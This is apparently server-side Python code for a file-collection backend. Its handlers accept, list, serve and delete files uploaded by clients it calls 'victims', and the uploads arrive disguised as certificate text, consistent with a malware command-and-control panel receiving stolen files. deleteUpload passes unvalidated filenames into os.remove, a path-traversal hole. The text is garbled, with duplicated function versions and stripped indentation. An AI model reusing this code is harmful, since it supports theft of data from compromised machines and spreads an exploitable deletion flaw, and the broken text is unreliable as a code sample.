def deleteUpload():
filename = request.form.get('filename').strip()
signature = request.form.get('signature').strip()
u = upload.upload()
u.delete(filename)
os.remove(config.upload_dir + os.sep + signature + os.sep + filename)
return 'success'
def upload_controller(signature):
c = victim.victim()
u = upload.upload()
pattern = r"^[0-9a-f]{32}$"
if not re.match(pattern, signature):
return 'error'
if not c.get(signature):
return 'error'
data = unquote(request.get_data())
data = data.replace('-----BEGIN CERTIFICATE-----', '')
data = data.replace('-----END CERTIFICATE-----', '')
data = data.strip()
try:
data = base64.b64decode(data)
except Exception as e:
return 'error'
originalname = request.args.get('filename')
pid = request.args.get('pid')
filename = ntpath.basename(originalname) + '.' + md5(data)
if not os.path.exists(upload_dir + os.sep + signature):
os.mkdir(upload_dir + os.sep + signature, 0700)
with open(upload_dir + os.sep + signature + os.sep + filename, 'w') as f:
f.write(data)
u.add(signature, pid, originalname, filename)
resp = make_response(filename, 200)
return resp
def upload_controller(signature):
c = victim.victim()
u = upload.upload()
pattern = r"^[0-9a-f]{32}$"
if not re.match(pattern, signature):
return 'error'
if not c.get(signature):
return 'error'
data = unquote(request.get_data())
data = data.replace('-----BEGIN CERTIFICATE-----', '')
data = data.replace('-----END CERTIFICATE-----', '')
data = data.strip()
try:
data = base64.b64decode(data)
except Exception as e:
print e
return 'error'
originalname = request.args.get('filename')
pid = request.args.get('pid')
filename = md5(data)
with open(upload_dir+os.sep+filename, 'wb') as f:
f.write(data)
u.add(signature, pid, originalname, filename)
resp = make_response(filename, 200)
return resp
def showUploads():
u = upload.upload()
signature = request.form.get("signature").strip()
files = u.getlist()
if files:
for i in xrange(len(files)):
files[i]["id"] = i
return json.dumps(files)
return "[]"
def showUploads():
u = upload.upload()
signature = request.form.get('signature').strip()
files = u.getbyclient(signature)
if files:
for i in xrange(len(files)):
files[i]['id'] = i
return json.dumps(files)
return '[]'
def getUploadedFileByPid():
pid = request.args.get("pid")
if not pid:
return "error"
pattern = r"^[0-9a-f]{32}$"
if not re.match(pattern, pid):
return "error"
# get filename by pid
a = upload.upload()
result = a.getbypid(pid)
filename = result["filename"]
originalname = result["originalname"]
if not os.path.exists(config.upload_dir + os.sep + filename):
return "error"
with open(config.upload_dir + os.sep + filename, "r") as f:
data = f.read()
# TODO: change content-type and use originalname
return data
def getUploadedFileByPid():
pid = request.args.get('pid')
if not pid:
return 'error'
pattern = r"^[0-9a-f]{32}$"
if not re.match(pattern, pid):
return 'error'
#get filename by pid
a = upload.upload()
result = a.getbypid(pid)
filename = result['filename']
originalname = result['originalname']
signature = result['signature']
if not os.path.exists(config.upload_dir + os.sep + signature + os.sep +
filename):
return 'error'
with open(config.upload_dir + os.sep + signature + os.sep + filename,
'r') as f:
data = f.read()
#TODO: change content-type and use originalname
return data
def deleteUpload():
filename = request.form.get("filename").strip()
u = upload.upload()
u.delete(filename)
os.remove(config.upload_dir + os.sep + filename)
return "success"
